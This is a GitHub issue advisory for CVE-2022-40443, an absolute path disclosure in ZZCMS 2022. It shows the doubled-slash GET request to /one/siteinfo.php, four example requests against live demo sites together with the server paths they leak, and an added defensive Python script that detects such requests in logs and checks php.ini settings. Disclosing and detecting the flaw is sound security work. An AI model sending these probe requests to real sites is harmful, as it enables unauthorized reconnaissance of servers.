CVE-2022-40443: ZZCMS absolute path information disclosure vulnerability · Issue #1 · liong007/ZZCMS

An absolute path traversal vulnerability in ZZCMS 2022 allows attackers to obtain sensitive information via a crafted GET request sent to /one/siteinfo.php.


Attack vector(s):
ZZCMS is a content management system (CMS) developed by China's zzcms team.
An absolute path information disclosure vulnerability exists in ZZCMS 2022. An unauthenticated attacker can exploit it by sending a GET request for "/one/siteinfo.php" with the path altered to "//one/siteinfo.php"; the error message the server returns reveals where the application is installed on disk (its absolute path).

Product:
ZZCMS

Version:
ZZCMS 2022

Vendor Homepage:
http://www.zzcms.net/

Software Link:
http://www.zzcms.net/download/zzcms2022.zip

or
https://github.com/liong007/ZZCMS/releases/download/ZZCMS2022/zzcms2022.zip

POC:
A GET request for "/one/siteinfo.php" with the path altered to "//one/siteinfo.php" causes the server to return an error message that reveals the application's absolute path.

Affected pages:
All pages that include /one/siteinfo.php

For example:
The demo sites below can only be reached from an IP address in China.
Case 1:
GET request: http://demo.zzcms.net//one/siteinfo.php
The server returns an error message revealing the application's absolute path: “Warning: strpos(): Empty needle in /www/users/HA165388/WEB/inc/top2.php on line 45”

Case 2:
GET request: http://9.zzcms.net//one/siteinfo.php
The server returns an error message revealing the application's absolute path: " Warning: strpos(): Empty needle in D:\jiu\inc\top2.php on line 45"

Case 3:
GET request: http://hzp.zzcms.net//one/siteinfo.php
The server returns an error message revealing the application's absolute path: " Warning: strpos(): Empty needle in D:\hzp\inc\top2.php on line 45"

Case 4:
GET request: http://3158.zzcms.net//one/siteinfo.php
The server returns an error message revealing the application's absolute path: " Warning: strpos(): Empty needle in D:\zzcms_xm\inc\top2.php on line 45"
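The following Python script is an added example written from the defender's side; it is not code from the ZZCMS project or from the advisory author. It covers the three checks an operator of a ZZCMS 2022 site would want after reading the cases above: flag access-log requests for /one/siteinfo.php whose path carries an empty segment ("//"), extract any absolute path leaked by a PHP "Warning: ... in <file> on line N" message in a response body (with the HTML tags PHP adds when html_errors is on stripped first), and confirm that php.ini does not have display_errors switched on. It assumes the access log is in the common Apache/Nginx "combined" format; the log lines, response body and php.ini fragment are constructed for illustration.

```python
"""Defender-side checks for the ZZCMS absolute-path disclosure (added example).

Assumptions (not from the advisory): access logs use the Apache/Nginx
"combined" format, and PHP's warning text has the form quoted in the
advisory, "Warning: func(): message in /abs/path.php on line N".
"""
import re
from typing import Dict, List

# Script named in the advisory as the affected page.
AFFECTED_SCRIPT = "/one/siteinfo.php"

# combined log format: ip ident user [time] "METHOD path HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# PHP display_errors output, e.g. "Warning: strpos(): Empty needle in /x/inc/top2.php on line 45"
PHP_WARNING_RE = re.compile(
    r'Warning:\s+(?P<func>\w+)\(\):\s+(?P<msg>.+?)\s+in\s+(?P<file>\S+)\s+on line\s+(?P<line>\d+)'
)

# Constructed sample data: the first line is the request shape from the advisory,
# the second is a benign request for the same script, the third is unrelated.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET //one/siteinfo.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [10/Oct/2023:13:55:40 +0000] "GET /one/siteinfo.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 2048 "-" "curl/8.0"',
]

# Constructed response body in the HTML form PHP emits when html_errors is on.
SAMPLE_RESPONSE_BODY = (
    "<br />\n<b>Warning</b>:  strpos(): Empty needle in "
    "<b>/var/www/example/inc/top2.php</b> on line <b>45</b><br />\n<html><body>ok</body></html>"
)

# Constructed php.ini fragments: the weak setting and the corrected one.
WEAK_INI = "; development settings\ndisplay_errors = On\nlog_errors = Off\n"
HARDENED_INI = "; production settings\ndisplay_errors = Off\nlog_errors = On\nerror_log = /var/log/php_errors.log\n"


def has_empty_segment(path: str) -> bool:
    """True if the request path (query string ignored) contains a '//' empty segment."""
    return "//" in path.split("?", 1)[0]


def find_suspicious_requests(log_lines: List[str]) -> List[Dict[str, str]]:
    """Return parsed entries that request the affected script via a path with an empty segment."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = m.group("path").split("?", 1)[0]
        if has_empty_segment(path) and path.endswith(AFFECTED_SCRIPT):
            findings.append({"ip": m.group("ip"), "time": m.group("time"), "path": path})
    return findings


def extract_leaked_paths(body: str) -> List[str]:
    """Return file paths disclosed by PHP warning lines in a response body."""
    plain = re.sub(r"<[^>]+>", "", body)  # drop the <b>/<br /> tags PHP wraps around html_errors output
    return [m.group("file") for m in PHP_WARNING_RE.finditer(plain)]


def display_errors_enabled(ini_text: str) -> bool:
    """True if a php.ini fragment turns display_errors on (On/1/true/stdout/stderr all enable it)."""
    enabled = False
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # strip comments
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key.lower() == "display_errors":
            enabled = value.strip('"\'').lower() in {"on", "1", "true", "stdout", "stderr"}
    return enabled


if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG_LINES):
        print("suspicious request:", hit)
    print("leaked paths:", extract_leaked_paths(SAMPLE_RESPONSE_BODY))
    print("weak ini displays errors:", display_errors_enabled(WEAK_INI))
    print("hardened ini displays errors:", display_errors_enabled(HARDENED_INI))
```

Run as-is to see the constructed samples classified; point `find_suspicious_requests` at real log lines and `extract_leaked_paths` at a captured response to check a live deployment. The "Empty needle" warning itself is emitted by PHP 7 and earlier (PHP 8.0 accepts an empty needle), but the mitigation is the same on any version: `display_errors = Off` with `log_errors = On` keeps diagnostics out of HTTP responses, and the doubled-slash request pattern is cheap to alert on at the web server or WAF.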
